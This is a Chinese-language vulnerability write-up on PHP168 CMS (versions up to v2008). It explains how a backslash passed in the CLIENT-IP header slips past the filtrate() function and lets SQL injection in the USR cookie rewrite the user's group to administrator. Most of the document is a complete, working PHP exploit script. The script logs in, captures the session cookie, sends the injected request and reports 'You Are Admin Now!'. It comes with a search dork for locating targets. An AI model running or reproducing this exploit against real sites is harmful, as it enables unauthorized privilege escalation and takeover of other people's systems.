|
by Ryat http://www.wolvez.org 2009-01-25
简单分析下这个漏洞
PHP代码 common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip 看一下filtrate函数是怎么处理的
PHP代码 function.inc.php function filtrate($msg){ $msg = str_replace('&','&',$msg); $msg = str_replace(' ',' ',$msg); $msg = str_replace('"','"',$msg); $msg = str_replace("'",''',$msg); $msg = str_replace("<","<",$msg); $msg = str_replace(">",">",$msg); $msg = str_replace("\t"," ",$msg); $msg = str_replace("\r","",$msg); $msg = str_replace(" "," ",$msg); return $msg; } 过滤了'"<等,但是没有处理\
PHP代码 common.inc.php if($usr_oltime>30||!$usr_oltime){ $usr_oltime>600 && $usr_oltime=600; include(PHP168_PATH."php168/level.php"); if( isset($memberlevel[$lfjdb[groupid]]) ){ $SQL=",groupid=8"; $lfjdb[money]=get_money($lfjuid); foreach( $memberlevel AS $key=>$value){ if($lfjdb[money]>=$value){ $SQL=",groupid=$key"; } } }else{ $SQL=""; } $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'"); //因为这个地方是拼接字符串的形式,所以可以使用\来转义',然后利用$usr_oltime来注射:) 另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:
PHP代码 UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid' 最后给个EXP:
PHP代码 #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$argv[0].' localhost /php168/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $resp = send(); preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie); if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!\nYou Are Admin Now!\n"); else exit("Exploit Failed!\n"); else exit("Exploit Failed!\n"); function rands($length = 8) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1000000); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } function send() { global $host, $path, $user, $pass, $cookie; if ($cookie) { $cookie[1] .= ';USR='.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t"; $cmd = ''; $message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ryat\\\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n"; $message .= "Cookie: ".$cookie[1]."\r\n\r\n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2"; $message = "POST ".$path."login.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; } $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>
|